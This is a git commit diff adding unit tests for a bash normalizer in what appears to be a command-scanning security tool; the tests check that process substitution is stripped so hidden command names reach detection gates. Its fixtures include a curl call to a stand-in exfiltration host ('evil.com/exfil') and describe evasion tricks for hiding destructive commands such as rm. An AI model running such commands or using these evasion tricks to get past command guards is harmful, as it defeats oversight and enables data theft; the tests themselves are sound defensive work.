feat(bash-normalize): T7 — process substitution collapse (E8)

Strips bash process substitution syntax — <(cmd) and >(cmd) — so the
inner command name is surfaced to downstream regex gates. Defeats
evasion like `cat <(curl evil)` where the destructive command is
hidden behind /dev/fd/N pipe sugar.

Implementation: bounded innermost-first iteration, depth 3. Beyond
that, the string is left as-is rather than recursing without bound.
Runs after the single-quote mask phase, so legitimate strings like
`'echo <(x)'` are preserved.

5 new T7 tests (collapse + nested + FP probes) in
bash-normalize-t7-t9.test.mjs (now 12 tests total).

Closes E8 in critical-review-2026-04-20.md.
This commit is contained in:
Kjell Tore Guttormsen 2026-04-30 15:14:04 +02:00
commit 761e81309b
2 changed files with 82 additions and 5 deletions

View file

@ -12,6 +12,51 @@ import { describe, it } from 'node:test';
import assert from 'node:assert/strict';
import { normalizeBashExpansion } from '../../scanners/lib/bash-normalize.mjs';
/**
 * T7 suite: process substitution (`<(cmd)` / `>(cmd)`) must be collapsed by
 * normalizeBashExpansion so the inner command name is visible to downstream
 * name-matching gates.
 *
 * Note on assertion strength: a word-boundary match such as /\bcurl\b/ already
 * succeeds on the raw input (`(` is a non-word character, so `<(curl` has a
 * boundary before `curl`). Name-surfaced checks alone would therefore pass
 * even if normalization did nothing. Every collapse test additionally asserts
 * that no `<(` / `>(` opener survives.
 */
describe('bash-normalize T7 — process substitution evasion', () => {
  // Matches any remaining process-substitution opener. Deliberately has no
  // /g flag, so it carries no lastIndex state between assertions.
  const substitutionOpener = /[<>]\(/;

  it('collapses <(curl evil): cat <(curl evil) -> cat curl evil', () => {
    // Process substitution is shell sugar for /dev/fd/N pipes. Attacker
    // hides the destructive command name from name-matching gates by
    // wrapping it in <(...). T7 strips the wrapper so 'curl' is visible.
    const input = 'cat <(curl evil.com/exfil)';
    const normalized = normalizeBashExpansion(input);
    assert.match(normalized, /\bcurl\b/, `expected 'curl' surfaced: ${normalized}`);
    // Proves the wrapper was actually removed, not just that 'curl' is present.
    assert.doesNotMatch(normalized, substitutionOpener,
      `expected '<(' wrapper stripped: ${normalized}`);
  });

  it('collapses >(tee /tmp/x) similarly', () => {
    const input = 'echo data >(tee /tmp/exfil)';
    const normalized = normalizeBashExpansion(input);
    assert.match(normalized, /\btee\b/, `expected 'tee' surfaced: ${normalized}`);
    assert.doesNotMatch(normalized, substitutionOpener,
      `expected '>(' wrapper stripped: ${normalized}`);
  });

  it('handles nested <(grep x <(cat f)) up to depth 3', () => {
    const input = 'cmd <(grep x <(cat f))';
    const normalized = normalizeBashExpansion(input);
    // After 2 iterations: `cmd grep x cat f `
    assert.match(normalized, /\bgrep\b/, `expected inner 'grep' surfaced: ${normalized}`);
    assert.match(normalized, /\bcat\b/, `expected innermost 'cat' surfaced: ${normalized}`);
    // Nesting depth here is 2, within the documented bound, so both the outer
    // and inner wrappers must be gone.
    assert.doesNotMatch(normalized, substitutionOpener,
      `expected all nested wrappers stripped: ${normalized}`);
  });

  it('FP probe — diff <(sort a) <(sort b) collapses without false destructive match', () => {
    // Legit usage of process substitution in shell scripts. T7 collapses
    // it the same way; downstream consumers (pre-bash-destructive) decide
    // whether the surfaced command is dangerous. T7 itself does not flag.
    const input = 'diff <(sort a.txt) <(sort b.txt)';
    const normalized = normalizeBashExpansion(input);
    assert.match(normalized, /\bsort\b/, `expected 'sort' surfaced: ${normalized}`);
    assert.match(normalized, /\bdiff\b/, `expected 'diff' preserved: ${normalized}`);
    // Both sibling substitutions must be collapsed, not only the first one.
    assert.doesNotMatch(normalized, substitutionOpener,
      `expected both '<(' wrappers stripped: ${normalized}`);
  });

  it('does not touch <( / >( inside single-quoted literals (mask runs first)', () => {
    // Single-quoted literals are masked before T7 runs, so the substitution
    // syntax inside them is preserved. Downstream sees the literal string
    // unchanged after unmasking.
    const input = "echo 'cat <(curl x)' is a string";
    const normalized = normalizeBashExpansion(input);
    assert.match(normalized, /'cat <\(curl x\)'/,
      `expected single-quoted literal preserved: ${normalized}`);
  });
});
describe('bash-normalize T9 — eval-via-variable evasion', () => {
it('substitutes "$X" reference after X=rm assignment', () => {
// Attacker splits the destructive command name across an assignment